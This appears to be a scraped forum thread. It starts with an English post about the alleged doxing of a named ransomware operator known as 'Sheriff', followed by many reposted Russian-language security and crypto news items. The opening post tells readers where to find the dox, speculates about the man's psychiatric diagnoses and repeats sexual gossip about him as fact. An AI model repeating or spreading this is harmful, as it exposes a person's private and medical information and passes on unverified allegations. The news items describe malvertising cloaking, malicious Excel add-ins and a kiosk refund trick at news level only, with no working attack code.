Alexander S. The colonial pipeline hacker, better known by his Alias: Sheriff. From Revil, Grand Crab, Trickbot and Conti to Lockbit and now Avois Locker this idiot should be the last one anyone hires, Now I am unaware of rules here on site as I am new to it but he has been indeed doxed. This was confirmed via Breach Forums around 2-3 hours ago when Researcher Pavel Kravkenko AKA D4RK R4BB1T paid a user to screen share breach forums shout box and pm Alexander via shout box and say "sup alex" however he'd erupt into a a fiery response trying to threaten the researcher with death after it became very apparent someone contacted his mother and shared proof of him claiming he'd wish ransomware would kill children in the west. What a gentlemen (Sarcastic) she must be a nice lady. Wishing death upon kids what a horrible take. Seeing lockbit has a heart I do wonder if that dev who hacked the hospital was indeed Alex? Lockbit maybe able to share some knowledge as it won't really do anything for western police since Alex is holed up in Moscow. Unlike the FBI, Researchers were quick to update his new home address from a "Last known to be in St Petersburg" to Living in Moscow.
Making matters worse he also admitted to working with the following:
Trickbot - When he was arrested in February of 2022 following Ukraine's
invasion and trying to get the US to back off he was questioned about ReVIL
and Trickbot
GrandCrab - Predecessor of Revil
Conti - Was where when he got doxed
New admissions to Lockbit & Avios Locker, Avios? Please ban this dude from
working with you Twitter screenshot of
admission
(Lockbit, Please tell me he has no access as well).
Had some affiliations with Hive Ransomware, Notable by his old account on
breach forums where he posted the login credentials.
New Account & Old FBI
Document
He hates Pavel so much he came out of
hiding?
[The FBI Document from Bleeping
Computer](https://cdn.discordapp.com/attachments/363695761004691456/1061034460063211610/govuscourts22million-
ransom-seizure.pdf)
Now, this Document is also backed up by OSINT from a 4th researcher.
Pavel, Pancak3, Unknown researcher (I forget his/her name) and Bleeping
Computer confirmed the validity of the information the FBI released and Pavel
and Pancak3 released a full dox of Sheriff including but not limited to:
Device Information, IPv4 Addresses, Passwords, Full Legal Name, Parents and
Relatives basic information, Emails, Logins, Cryptocurrency Addresses,
Screenshots and other very specific/highly confidential records including
Medical records and Habits which include autism and nail biting which no doubt
with Autism he may have other diagnosed conditions as Nail biting to the
extent which is described is quite strange without the use of drugs or other
mental conditions I'd wager something to do with eating or anxiety which maybe
part of schizophrenia or Bi-Polar disorder but I am not a doctor and this is
pure speculation
And of course to top it all off, Pavel has seemed to gain the attention of federal agencies in at least 3 different nations and is constantly looking for dutch, German, polish and Romanian authorities. With the US, Switzerland and France being marked "filled"
Now due to my lack of knowledge of doxing being allowed or not you can find
Sheriff's Dox floating around on Flamebin.com or by simply looking into
Pavel's Twitter or through the use of google
To prove he was part of Colonial Pipeline attack he also used the same Gmail
Address on breached under his old account hence why it's now "Deleted" and not
"banned" as he did scam people.
Figured I'd share since if Pavel is scaring some top tier threat actors into
showing their face and ask everyone to be cautious as he seems to have a
silver tongue and a eye for errors.
Fun note: According to people around Sheriff he also enjoys feet pics and has a wild fetish for such pics, Spending up to $9,000 USD for them from 1 person. Unlike Lockbit's tattoo idea, this man has spent more on 1 person's feet than lockbit has spent on on tattoos which tattoos are permanent feet pics aren't. Such a strange business model. Lockbit if I was you I'd not open the door to give Pavel any more ammunition which he has enough of already.
Hopefully this comes as a bit of comedic relief, Some news for ransomware developers and the ever lurking researchers. I'll keep everyone up to date with this so long as I remain on the site, since this is a public records case I don't think I'll be banned.
Группа исследователей из нескольких китайских научных центров и университетов предложила новый способ оптимизации процесса факторизации параметров RSA-ключей на квантовых компьютерах. По заявлению исследователей разработанный ими метод позволяет обойтись для взлома ключей RSA-2048 квантовым компьютером с 372 кубитами. Для сравнения, [IBM Osprey](https://newsroom.ibm.com/2022-11-09-IBM-Unveils-400-Qubit-Plus- Quantum-Processor-and-Next-Generation-IBM-Quantum-System-Two), самый мощный из ныне созданных квантовых компьютеров, содержит 433 кубита. Тем не менее, метод пока является лишь теоретическим, не опробован на практике и вызывает [скептическое отношение](https://www.schneier.com/blog/archives/2023/01/breaking-rsa-with-a- quantum-computer.html) некоторых криптографов.
В основе шифрования RSA лежит операция возведения в степень по модулю большого числа. В открытом ключе содержится модуль и степень. Модуль формируется на основании двух случайных простых чисел, которые известны только владельцу закрытого ключа. Квантовые компьютеры позволяют эффективно решать задачу разложения числа на простые множители, что может использоваться для синтеза закрытого ключа на основе открытого.
До сих пор считалось, что с учётом нынешнего развития квантовых компьютеров RSA-ключи размером 2048 бита ещё долго не смогут быть взломаны, так как при применении классического алгоритма Шора для факторизации 2048-битного RSA- ключа требуется квантовый компьютер с миллионами кубитов. Предложенный китайскими исследователями метод ставит данное предположение под сомнение и в случае подтверждения работоспособности позволяет взламывать ключи RSA-2048 не на системах далёкого будущего, а на уже существующих квантовых компьютерах.
Метод основан на предложенном в 2021 году алгоритме быстрой факторизации Шнорра, позволяющем добиться кардинального сокращения числа операций при подборе на обычных компьютерах. Тем не менее, на практике алгоритм оказался малопригоден для взлома реальных ключей, так как срабатывал только для RSA- ключей с небольшими значениями модуля (целое число, которое нужно разложить на простые числа). Для факторизации больших чисел алгоритм оказался непригоден. Китайские исследователи утверждают, что при помощи квантовых методов они смогли обойти ограничение применения алгоритма Шнорра.
Скептическое отношение некоторых криптографов связано с тем, что в статье китайских исследователей демонстрируется применение их метода только с небольшими числами, примерно того же порядка, для которого срабатывает алгоритм Шнорра. Несмотря на заявления, что ограничение на размер преодолено, доказательств и подробностей пока не предоставлено. На практике работа метода показана для факторизации 48-битных целых чисел с использованием квантового компьютера на 10 кубитов.
Предположение, что для факторизации ключа RSA-2048 будет достаточно 372 физических кубитов делается теоретически, поэтому имеется большая вероятность того, что основанный на алгоритме Шнорра квантовый метод имеет те же проблемы с масштабированием и не сработает при разложении больших чисел. Если же проблема с масштабированием действительно решена, то стойкость криптоалгоритмов, основанных на сложности разложения больших простых чисел на множители, окажется подорванной не в дальней перспективе, как ожидалось, а уже в настоящее время.
3 января 2009 года человек или группа людей под псевдонимом Сатоши Накамото запустил/-и основную сеть биткоина, добыв генезис-блок с 50 BTC.
В его хеше содержится заголовок статьи «Chancellor on brink of second bailout
for banks» британского издания The Times.
Незадолго до запуска сети, 31 октября 2008 года, был опубликован white paper
биткоина.
Первая транзакция состоялась 12 января 2009 года — Сатоши Накамото отправил 10 BTC Хэлу Финни. За три дня до этого опубликована версия ПО Bitcoin 0.1.
Личность Накамото и мотивы создания биткоина до сих пор остаются тайной, которую пытаются разгадать в криптосообществе и за его пределами.
Одной из вероятных причин создания биткоина стал разразившийся в 2007-2008 годах мировой финансовый кризис, сопровождавшийся крахом крупнейших инвестиционных банков, повсеместным снижением объемов производства, падением спроса и цен на сырье, ростом безработицы и активным вмешательством государств в экономику.
В ноябре 2021 года первая криптовалюта обновила максимум на отметке $69 000. На момент написания цифровое золото торгуется в районе $16 740, на 75,8% ниже ATH. Капитализация флагмана рынка составляет $321,8 млрд.
Happy Genesis Block Day!
Аналитики [Cisco Talos](https://blog.talosintelligence.com/xlling-in-excel- malicious-add-ins/) рассказывают, что после того как Microsoft начала блокировать макросы VBA в загруженных из интернета документах Office (с отметкой Mark Of The Web), злоумышленникам пришлось пересматривать свои цепочки атак. Например, теперь хакеры все чаще используют файлы надстроек Excel (.XLL) в качестве начального вектора компрометации.
По словам экспертов, документы Office, распространяемые с помощью фишинговых писем и прочей социальной инженерии, остаются одним из наиболее популярных у злоумышленников векторов атак. Такие документы традиционно предлагают жертвам включить макросы для просмотра якобы безобидного контента, а на самом деле активируют скрытое выполнение малвари в фоновом режиме.
Ради борьбы с этими злоупотреблениями, в начале текущего года, Microsoft начала блокировать макросы VBA в загруженных из интернета документах Office. Хотя в компании признавали, что из-за этого получили негативный фидбек от пользователей и даже были вынуждены временно отменить это решение, в итоге блокировка VBA-макросов все же [была продолжена](https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping- users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805).
Невзирая на то, что блокировка распространяется только на новейшие версии Access, Excel, PowerPoint, Visio и Word, злоумышленники начали экспериментировать с альтернативными путями заражения и развертывания малвари. Как сообщают исследователи, одним из таких «новшеств» стало использование [файлов XLL](https://learn.microsoft.com/en-us/office/dev/add-ins/excel/make- custom-functions-compatible-with-xll-udf), которые Microsoft описывает как «вид файлов DLL, которые можно открыть только в Excel».
«Файлы XLL можно отправлять по электронной почте, и даже с учетом работы обычных механизмов сканирования на наличие вредоносных программ, пользователи могут открыть их, не зная, что такие файлы могут содержать вредоносный код», — пишут в Cisco Talos.
Click to expand...

Хотя Excel предупреждает о потенциальной опасности XLL, такие предупреждения
пользователи обычно не замечают
По данным экспертов, хакеры сочетают надстройки, написанные на C++, с
надстройками, разработанными при помощи бесплатного инструмента Excel-DNA. И
если первые подобные эксперименты хакеров были замечены еще несколько лет
назад, то 2021-2022 годах такие атаки стали развиваться гораздо активнее.

Исследователи пишут, что XLL уже во всю злоупотребляют китайские хак-группы
APT10 и TA410 (причем они начали еще в 2017 году); русскоязычная группировка
FIN7, которая начала использовать файлы надстроек в своих кампаниях минувшим
летом; известный загрузчик малвари Dridex и загрузчик FormBook; а также другие
крупные семейства вредоносов, включая AgentTesla, Ransomware Stop, Vidar, Buer
Loader, Nanocore, IceID, Arkei, AsyncRat, BazarLoader и так далее.

«Поскольку все больше и больше пользователей переходят на новые версии Microsoft Office, вполне вероятно, что в будущем хакеры откажутся от вредоносных документов с VBA и перейдут на другие форматы (такие как XLL), или станут полагаться на использование недавно обнаруженных уязвимостей для запуска вредоносного кода в пространстве приложений Office», — резюмируют аналитики.
Click to expand...
Операторы малвари все чаще злоупотребляют рекламой Google Ads для распространения вредоносных программ среди пользователей, которые ищут популярное ПО. Так, столкнуться с вредоносными объявлениями можно при поиске Grammarly, MSI Afterburner, Slack, Dashlane, Malwarebytes, Audacity, μTorrent, OBS, Ring, AnyDesk, Libre Office, Teamviewer, Thunderbird и Brave.
О проблеме в деталях рассказали специалисты компаний [Trend Micro](https://www.trendmicro.com/en_us/research/22/l/icedid-botnet- distributors-abuse-google-ppc-to-distribute-malware.html) и [Guardio Labs](https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by- threat-actors-targeting-organizations-gpus-42ae73ee8a1e). По их данным, хакеры все чаще используют тайпсквоттинг, клонируют официальные сайты вышеуказанных программ и производителей, а затем распространяют через них троянизированные версии ПО, которые в итоге загружают пользователи.
Среди малвари, доставляемой таким способом, встречаются версии стилера Raccoon, кастомная версия стилера Vidar, а также загрузчик малвари IcedID.
[](https://xakep.ru/wp-
content/uploads/2022/12/411023/1QP8yg4cMk6EUIHtBQ6N3lg.jpg)Фальшивый и
настоящий сайт
Однако до недавнего времени было неясно, как именно пользователи попадают на
такие вредоносные сайты. Оказалось, всё дело в злоупотреблениях рекламой в
Google.
Эксперты Trend Micro и Guardio Labs рассказывают, что у Google, конечно, есть защитные механизмы на такой случай, однако злоумышленники научились их обходить. Дело в том, что если Google обнаружит, что лендинг, стоящий за рекламным объявлением, является вредоносным, кампания будет немедленно заблокирована, а реклама удалена. Поэтому злоумышленники действуют осторожно: сначала пользователей, кликнувших на рекламу, перенаправляют на нерелевантный, но безопасный сайт, так же подготовленный хакерами. Лишь оттуда жертву уже перенаправят непосредственно на вредоносный ресурс, маскирующийся под официальный сайт какого-то ПО.
[](https://xakep.ru/wp-
content/uploads/2022/12/411023/sites2.jpg)Работа редиректов
Что касается полезных нагрузок, обычно они представлены в форматах ZIP или MSI
и загружаются из авторитетных служб для обмена файлами и хостинга кода,
включая GitHub, Dropbox или CDN Discord. Благодаря этому, антивирусные
программы, работающие на компьютере жертвы, вряд ли станут возражать против
таких скачиваний.
Эксперты Guardio Labs говорят, что в ходе одной кампании, которую они наблюдали в ноябре текущего года, злоумышленники распространяли среди пользователей троянизированную версию Grammarly, которая содержала стилер Raccoon. При этом малварь шла «в комплекте» с легитимным ПО, то есть пользователь получал ту программу, которую искал, а малварь устанавливалась «в довесок», автоматически.
Guardio Labs, давшая таким атакам название MasquerAds, приписывает большую часть этой вредоносной активности группировке Vermux, отмечая, что хакеры «злоупотребляют большим количеством брендов и продолжают развиваться». По их данным, Vermux в основном атакует пользователей в Канаде и США, используя фальшивые сайты для распространения вредоносных версий AnyDesk и MSI Afterburner, зараженных майнерами криптовалюты и стилером Vidar.
[](https://xakep.ru/wp-
content/uploads/2022/12/411023/flow.jpg)Схема атаки
Интересно, что именно эта активность хакеров, о которой теперь в деталях
рассказали эксперты, недавно вынудила ФБР опубликовать
предупреждение и рекомендацию по
использованию блокировщиков рекламы (чтобы не видеть потенциально опасных
объявлений в поисковиках вовсе).
Злоумышленники запросили у организации $60 млн.
Несмотря на то, что год подходит к концу, хакеры остаются активны. Во вторник группировка Royal взяла на себя ответственность за кибератаку на телекоммуникационную компанию Intrado. Как сообщают специалисты, все произошло 1 декабря, а злоумышленники потребовали $60 миллионов выкупа.
Злоумышленники утверждают, что им в руки попали внутренние документы, паспорта и водительские права сотрудников Intrado и теперь угрожают слить их, если не будет выплачен выкуп. Чтобы подтвердить серьезность своих намерений, банда киберпреступников разместила в общем доступе папку размером 52,8 МБ, содержащую сканы паспортов, контрактов и водительских прав сотрудников.
Эксперты считают, что инцидент связан с декабрьским сбоем в системах Intrado, которое затронуло все сервисы компании. Позже пресс-секретарь Министерства здравоохранения и социальных служб США (HSS) написала в Twitter, что неполадки в сетях Intrado были устранены и что HSS продолжает расследование, чтобы узнать кто за ними стоит.
Несмотря на то, что инцидент произошел 1 декабря, телекоммуникационная
компания все еще работает над устранением последствий кибератаки.
Напомним, не так давно мы подробно разобрали стратегию и инструменты Royal. По
данным Trend Micro, вымогательское ПО группировки нацелена в основном на жертв
в США, Бразилии и Мексике. Для доставки Royal используется фишинговая атака с
обратным звонком (callback phishing), в результате которой злоумышленники
убеждают жертву установить ПО для удаленного доступа.
Президент пообещал дать соответствующие поручения МВД.
Владимир Путин поддержал идею введения уголовной ответственности за незаконный
оборот персональных данных — в частности, за использование утекших баз данных.
Член СПЧ, глава Национального антикоррупционного комитета Кирилл Кабанов
призвал ввести в законодательство понятие «незаконный оборот персональных
данных» по аналогии с понятием о незаконном обороте наркотиков.
Кабанов напомнил о крупных утечках данных клиентов компаний « Яндекс.Еды » и « Гемотеста », которые произошли в этом году. По его словам такие утечки могут «повлечь совершенно конкретные негативные последствия».
«Те, кто использует эти данные, должны знать и понимать, что они используют украденные данные. Именно так, потому что даже украденное имущество — добросовестный приобретатель ведь не знает, что покупает украденный товар. По аналогии, то же самое и здесь», — ответил Путин.
Кроме предложения о введении уголовной ответственности за использование утекших баз данных, Путин также согласился с предложением Кабанова ввести оборотные штрафы для компаний, которые допустили утечки. Президент пообещал дать соответствующие поручения МВД. Важно, чтобы такие запреты и регулирования не мешали развитию необходимых для страны технологий, добавил президент.
Группа подростков обнаружила баг в терминалах самообслуживания сети ресторанов «Вкусно – и точка» и, по данным СМИ, эксплуатировала его около месяца, заказывая еду бесплатно. В компании уже подтвердили, что работают над устранением технической проблемы.
На опубликованном видео видно, как подростки заказывают еду через кассу самообслуживания, а завершив заказ, открывают техническую дверцу, отключают питание терминала, а после этого идут забирать заказ.
Такую картину можно было наблюдать во «Вкусно — и точка» на Волоколамском шоссе в октябре текущего года. В общей сложности школьники успели сделать «бесплатные заказы» на сумму около 12 000 рублей.
Почему заказы были «бесплатными»? Дело в том, что после такого выключения и выключения терминала самообслуживания система автоматически возвращала деньги за последний заказ. Причем происходящее и стоящий за этим баг заметили только во время проверки кассовой отчетности, когда в итоге обнаружилась недостача.
Представители «Вкусно — и точка» уже подтвердили, что такой баг в системе действительно существовал, и в настоящее время в компании работают над его устранением.
При этом в компании не сообщили, были ли установлены личности клиентов, воспользовавшихся уязвимостью, а также будет ли возмещен нанесенный ими ущерб.
Две недели назад компанию LastPass, разрабатывающую одноименный менеджер паролей, которым пользуются более 33 миллионов человек по всему миру, взломали неизвестные злоумышленники. Хакерам удалось LastPass похитить исходные коды и проприетарную техническую информацию.
Журналисты издания Bleeping Computer сообщают, что они узнали об этой атаке от инсайдеров еще на прошлой неделе, однако попытка связаться с компанией и узнать подробности ни к чему не привела. Собственные источники издания говорят, что сотрудники LastPass изо всех сил старались сдержать атаку и не допустить распространения компрометации после взлома.
Теперь факт атаки наконец подтвержден официально: LastPass опубликовала [заявление](https://blog.lastpass.com/2022/08/notice-of-recent-security- incident/), в котором рассказала об инциденте.
В компании сообщили, что хакеры получили доступ к среде разработки, скомпрометировав учетную запись одного из сотрудников. Хотя в LastPass заявляют, что не обнаружено никаких доказательств компрометации данных клиентов и зашифрованных хранилищ паролей, подтверждено, что злоумышленники смогли украсть части исходного кода и «проприетарную техническую информацию».
«Пока наше расследование продолжается, мы достигли состояния сдерживания, внедрили дополнительные усиленные меры безопасности и в настоящее время не видим никаких дополнительных свидетельств несанкционированной деятельности», — заявляют в компании, отмечая, что к расследованию случившегося уже привлечены сторонние киберкриминалисты.
Click to expand...
Ссылаясь на продолжающееся расследование, компания не предоставила никаких дополнительных подробностей об атаке, а также о том, как злоумышленники скомпрометировали учетную запись разработчика, и какой именно исходный код был похищен.
СПГ-терминалы в Нидерландах могут стать основной мишенью хакеров.
ИБ-компания Dragos, специализирующаяся на защите промышленных компаний,
обнаружила, что 2 хакерские группы, Xenotime и Kamacite, проводят
«исследования цифровых систем» СПГ-терминала Gasunie в Роттердаме
(Нидерланды). Считается, что эти группировки якобы связаны с Россией.
Также ожидается, что хакеры проанализируют системы других европейских
терминалов СПГ (Сжиженный природный газ) и инфраструктуру в энергетическом
секторе, чтобы увидеть, где они могут потенциально повлиять на системы.
Другие ИБ-компании также наблюдают рост активности в отношении критической
инфраструктуры в Европе и Нидерландах. По словам голландской ИБ-компании
EclecticIQ, группа Xenotime впервые фокусируется на Европе – «голландские СПГ-
терминалы в настоящее время являются предпочтительным объектом исследований
российских хакеров».
По данным ИБ-компании ESET с января по сентябрь 2022 года в среднем происходит
более 5 млн. уникальных кибератак в месяц. Это более чем на 20% больше, чем в
2021 году. Сюда входят фишинговые атаки, атаки с использованием программ-
вымогателей или других типов вредоносных программ, а также DDoS-атаки.
По оценке фирмы Fox-IT, из-за энергетического кризиса компании, работающие в
энергетическом секторе, являются основной мишенью киберпреступников. Особенно
в цепочке поставок и распределения СПГ. «Для Нидерландов сейчас важен СПГ,
поскольку поставки российского газа приостановлены. Если эти терминалы по
какой-либо причине остановятся, мощности по добыче газа будут потеряны», -
говорит Рене Петерс, директор по газовым технологиям TNO.
СПГ-терминал Eemshaven в Нидерландах сейчас производит 8 млрд. кубометров в
год. Кроме того, производство газа в Роттердаме будет увеличена до 16 млрд.
кубометров в год. В совокупности на них приходится более 50% потребления газа
в Нидерландах, составляющего 40 млрд. кубометров газа в год.
Нидерландская газотранспортная компания Gasunie не уточнила, известно ли ей о
хакерах, которые ищут уязвимости в сетях компании. Также фирма не сказала,
ужесточила ли она меры Ранее отрасль СПГ уже подвергалась кибератакам.
8 июня 2022 года на заводе крупного американского экспортера СПГ Freeport LNG
в Техасе произошел взрыв. Понесенный ущерб приостановил работу фабрики до
конца 2022 года. Взрыв оказал непосредственное влияние на увеличение цен на
газ в Европе.
Несколько источников обнаружили отказ в срабатывании систем безопасности и
связали эту причину с атакой XENOTIME .
Сообщают о целых рейдах против нарушителей.
К ним домой приходят сотрудники Министерства национальной безопасности, а также полиция, чтобы проверить телефоны и планшеты. Подозрение вызывают все граждане, использующие более 3 ГБ Интернета.
Данные о подозрительной активности власти берут напрямую у телекоммуникационных компаний, чтоб затем проверить их «на месте» и изъять устройства. Уличенных в использовании VPN допрашивают часами и держат в заключении до 15 дней.
Ранее в Туркменистане власти обвалили работу 70 процентов Интернет-ресурсов и заблокировали доступ к соцсетям и большинству иностранных сайтов.
У граждан, которые пользовались платными VPN серверами, требуют рассказать у кого они купили их. Попавшихся первый раз граждан допрашивают в течение дня и отпускают с предупреждением.
«А
тех, кто попался во второй или третий раз, если они не выдают информацию о
том, где они купили VPN, держат под арестом 10 дней. И если в течение 10 дней
человек не выдаёт то, где он приобрёл платный VPN, срок ареста продлевают до
15 суток»,
У работников бюджетных организаций берут расписки о том, что они не будут
использовать VPN программы.
FTX Group подала заявление о несостоятельности в соответствии с Главой 11 Кодекса США о банкротстве. Сэм Бэнкман-Фрид ушел с поста CEO.
Press Release pic.twitter.com/rgxq3QSBqm
— FTX (@FTX_Official) November 11, 2022Click to expand...
На должность гендиректора назначен Джон Рэй III.
Помимо FTX Trading Ltd., речь идет о примерно 130 аффилированных юрлицах, в
том числе Alameda Research.
Согласно пресс-релизу, заявление не включает LedgerX LLC, FTX Digital Markets
Ltd., FTX Australia Pty Ltd. и FTX Express Pay Ltd.
«[Подача заявления в соответствии с Главой 11] уместно, чтобы дать FTX Group возможность оценить свою ситуацию и разработать процедуру для максимального возмещения», — заявил Джон Рэй III.
Click to expand...
По его словам, FTX Group «обладает ценными активами, которыми можно эффективно управлять только в рамках организованного совместного процесса».
«Я хочу заверить каждого сотрудника, клиента, кредитора, контрагента, акционера, инвестора, правительственный орган и другую заинтересованную сторону в том, что мы будем проводить эту работу с усердием, тщательностью и прозрачностью», — добавил CEO.
Click to expand...
Согласно [заявке](https://www.docdroid.net/F0TqEsL/alameda-chapter-11-db- pdf#page=4) Alameda Research, у нее более 100 000 кредиторов. Активы и обязательства компании оцениваются в диапазоне от $10 млрд до $50 млрд.

Данные: заявление Alameda Research.
Бэнкман-Фрид выразил сожаление и надежду, что принятое решение является лучшим
для клиентов.
- This doesn’t necessarily have to mean the end for the companies or their ability to provide value and funds to their customers chiefly, and can be consistent with other routes.
Ultimately I’m optimistic that Mr. Ray and others can help provide whatever is best.
— SBF (@SBF_FTX) November 11, 2022Click to expand...
«Это не обязательно должно означать конец для компаний или их способности предоставлять ценность и средства главным образом своим клиентам, и может быть совместимо с другими путями. В конечном счете, я настроен оптимистично в отношении того, что Рэй и другие могут помочь обеспечить все самое лучшее», — написал Бэнкман-Фрид.
Click to expand...
9 ноября состояние экс-главы FTX [рухнуло](https://forklog.com/news/bloomberg- isklyuchil-sema-benkmana-frida-iz-spiska-milliarderov) на 94% – с $15,6 млрд до $992 млн, а теперь и вовсе [до нуля](https://www.bloomberg.com/news/articles/2022-11-11/sam-bankman-fried-s- assets-go-from-16-billion-to-zero-after-ftx- collapse?leadSource=uverify%20wall).
Биткоин отреагировал на новость падением. За последние сутки актив подешевел на 3,2% (CoinGecko). В моменте актив опустился ниже $16 300, в настоящее время котировки поднялись над уровнем $17 000.

Часовой график BTC/USD биржи Binance. Данные: TradingView.
11 ноября аналитик FatMan предположил, что в случае банкротства FTX «есть
большая вероятность» раскрытия детальной информации о пользователях и их
транзакциях. К примеру, [подавшая заявление о
несостоятельности](https://forklog.com/celsius-podala-zayavlenie-o-
bankrotstve/) криптолендинговая платформа Celsius Network [опубликовала 14 000
страниц данных](https://forklog.com/news/celsius-network-raskryla-detalnye-
dannye-o-tranzaktsiyah-polzovatelej), содержащих полное имя и временные метки
по всем транзакциям клиентов, включая депонирование, вывод и ликвидацию.
Prepare your online presence. If FTX goes into bankruptcy, there is a good chance that full names and crypto balances of all users will be made public. It will be a privacy nightmare, and many will be blackmailed/harmed. Consider this an eventuality and take preemptive measures.
— FatMan (@FatManTerra) November 11, 2022Click to expand...
«Это будет кошмар для конфиденциальности, и многие подвергнутся шантажу/причинению вреда», — написал FatMan.
Click to expand...
Напомним, 6 ноября CEO Binance Чанпэн Чжао заявил о стремлении компании избавиться от utility-токена FTT биржи FTX. Активы вместе с BUSD суммарно на ~$2,1 млрд стали итогом выхода компании из портфельной инвестиции в платформу.
8 ноября Бэнкман-Фрид и Чжао объявили о стратегическом партнерстве, однако 10 ноября Binance отказалась от поглощения FTX. В компании заявили, что не смогут решить возникшие у биржи проблемы.
Участники индустрии поспешили дистанцироваться от биржи Сэма Бэнкмана-Фрида и связанной с ней Alameda Research. Один из инвесторов FTX, венчурная фирма Sequoia Capital, признала невозвратными вложения на сумму $213,5 млн.
По данным СМИ, американские регуляторы приступили к изучению связей FTX с подразделением в США и Alameda Research. Деятельностью платформы заинтересовалось и Министерство юстиции.
Согласно Bloomberg и WSJ, «дыра» в балансе платформы составила $8 млрд. Однако Reuters озвучило большую сумму — $9,4 млрд.
Комиссия по ценным бумагам Багамских Островов заблокировала активы FTX Digital Markets и аффилированных юридических лиц, а также приостановила лицензию компании в стране.
Агентство финансовых услуг Японии предписало местному подразделению биржи приостановить операции и перейти в режим close-only. Также стало известно, что регулятор Кипра намерен приостановить действие лицензии европейского филиала FTX.
Томский районный суд приговорил гражданина К. к 3-м годам ограничения свободы за использование VPN программы, квалифицировав данное деяние по ст.273 УК РФ (вредоносные программы). Осужденный признал, что с помощью VPN были нейтрализованы средства защиты компьютерной информации, выразившиеся в невозможности однозначной идентификации пользователя и его сетевой активности в сети «Интернет».
Находясь по месту своего проживания в квартире и используя принадлежащий ему персональный компьютер с доступом к сети «Интернет», К. осуществил поиск вредоносной компьютерной программы, выражающейся в невозможности однозначной идентификации пользователя сети «Интернет» и его сетевой активности, в том числе провайдером, предоставляющим доступ к сети «Интернет» и заведомо для него предназначенной для нейтрализации средств защиты компьютерной информации провайдеров, направленных на однозначную идентификацию пользователя в сети «Интернет». Умышленно указанную программу в целях ее последующего использования он записал на SSD диск со своего персонального компьютера, после чего в период с 2018 года по 2020 года, осознавая, что использование данной программы приведет к нейтрализации средств защиты компьютерной информации провайдеров, регулярно осуществлял запуск вредоносной компьютерной программы со своего персонального компьютера, тем самым используя ее. В результате использования гражданином К. вредоносной компьютерной программы были нейтрализованы средства защиты компьютерной информации, выразившиеся в невозможности однозначной идентификации пользователя и его сетевой активности в сети «Интернет», в том числе провайдером, оказывавшим услуги связи, включая доступ к сети «Интернет» по месту жительства гражданина К.
С учетом обстоятельств дела и данных о личности подсудимого, который вину в совершении преступлений признал, раскаялся в содеянном, суд признал гражданина К. виновным в совершении преступления, предусмотренного ч. 1 ст. 273 УК РФ, назначил ему наказание в виде 3 лет ограничения свободы. В соответствии с ч. 1 ст. 53 УК РФ установил гражданину К. ограничения: не выезжать за пределы территории муниципального образования «город Томск», не изменять место жительства (пребывания) без согласия специализированного государственного органа, осуществляющего надзор за отбыванием осужденными наказания в виде ограничения свободы.
Источник: https://www.securitylab.ru/news/534716.php
p.s.
1.) Кто мне скажет что курили на суде?
2.) С хуяли VPN попадает под 273 статью?
p.p.s.
Просто с таким же успехом можно купить тогда уж VPN от AV и потом сказать что
компания "К" распространяет вредоносные программы
Варваре, дочери Валерия Серегина, позвонил неизвестный и представился
силовиком. Сказал: с вашего счёта уходят переводы страшным радикалам, а это не
очень хорошо. Затем позвонили уже "из банка" и сказали, что выход есть. Нужно
только перенести свои счета в другое место.
Тогда Варвара помчалась в родной Газпромбанк, и уже реальные сотрудники предупредили девушку, что её разводят. А заодно связались с её матерью, которая попросила заблокировать и карточку дочери, и доступ к её банковскому приложению. Но, видимо, доверия к мошенникам было больше, и Варвара продолжила выполнять их команды.
Она купила в ближайшем салоне новый телефон, загрузила приложение стороннего банка, и до тех пор, пока не сработала блокировка, успела перевести 49 миллионов рублей. Сколько ещё денег осталось на счёте — загадка.
source: t.me/breakingmash/39494
Холдинг «Росэлектроника» Госкорпорации Ростех совместно с компанией «Открытая мобильная платформа» завершил разработку защищенного корпоративного мессенджера «Колибри». Решение, предназначенное для устройств на ОС «Аврора» 4.0, позволяет безопасно обмениваться информацией и минимизирует возможность информационных утечек.
Click to expand...
Мессенджер входит в состав комплексного решения, которое также включает VPN- клиент «Колибри» и абонентский специализированный модуль криптографической обработки информации в виде microSD-карты. Модуль построен на отечественной элементной базе, поддерживает российские криптоалгоритмы и имеет встроенные аппаратные средства защиты информации. Благодаря этому пользователи могут подключаться к корпоративным облачным web-сервисам, не опасаясь информационных утечек.
В составе Ростеха проект реализует Пензенский научно-исследовательский электротехнический институт (ПНИЭИ) холдинга «Росэлектроника».
«В мессенджере используются только российские доверенные решения, что гарантирует информационную безопасность корпоративных коммуникаций. В дальнейшем мы планируем адаптировать для ОС «Аврора» разработанную ПНИЭИ технологию аутентификации на основе биометрии, нейронных сетей и криптографии, а также дополнить этой опцией продукты «Колибри», – сказал генеральный директор ПНИЭИ Вячеслав Фунтиков.
source: rostec.ru/news/rostekh-razrabotal-zashchishchennyy-messendzher-kolibri
Басманный суд Москвы арестовал троих администраторов Telegram-канала "Сканер" по обвинению в мошенничестве в крупном размере.
Как сообщили ТАСС в суде, арестованы А. С. Слободенюк, Е. В. Москвин и В. И. Малушенко. "Все трое обвиняются по ч. 3 ст. 159 УК РФ ("Мошенничество в крупном размере")", - сказали в суде, не уточнив деталей уголовного дела обвиняемых. В случае признания виновными им грозит до шести лет лишения свободы.
Как сообщил ТАСС источник в правоохранительных органах, суд избрал всем троим меру пресечения в виде заключения под стражу до 25 сентября 2022 года. "Это произошло еще 4 августа, однако широкой общественности об этом не сообщалось",
Он пояснил, что сам канал занимается раскрытием личных данных российских чиновников и сотрудников силовых структур. В мае 2022 года Басманный суд заочно арестовал основателя канала, журналиста Руслана Карпука, обвиняемого по ч. 2 ст. 207.3 УК РФ ("Публичное распространение заведомо ложной информации об использовании Вооруженных сил РФ")". Он объявлен в международный розыск. По его делу также проходит журналист Майкл Наки, который также разыскивается правоохранителями.
Как сказано в тексте постановления суда об избрании меры пресечения Евгению Москвину, он является "ведущим специалистом ООО "Народные новости", зарегистрированного в Санкт-Петербурге". Там также отмечается, что Москвин признал вину, и на основании этого просил избрать ему более мягкую меру пресечения, однако суд с его доводами не согласился.
Согласно описанию, Telegram-канал "Сканер" создан для "мониторинга коррумпированных чиновников", он имеет более 201 тыс. подписчиков.
source: tass.ru/proisshestviya/15435643
Как выяснилось, Ransom Cartel использует инструменты и исходный код шифровальщика REvil.
О подозрительной связи RaaS-группировки Ransom Cartel и REvil заявили исследователи из подразделения Unit 42 компании Palo Alto Networks. Согласно их отчету, Ransom Cartel начала свою деятельность всего через два месяца после развала REvil.
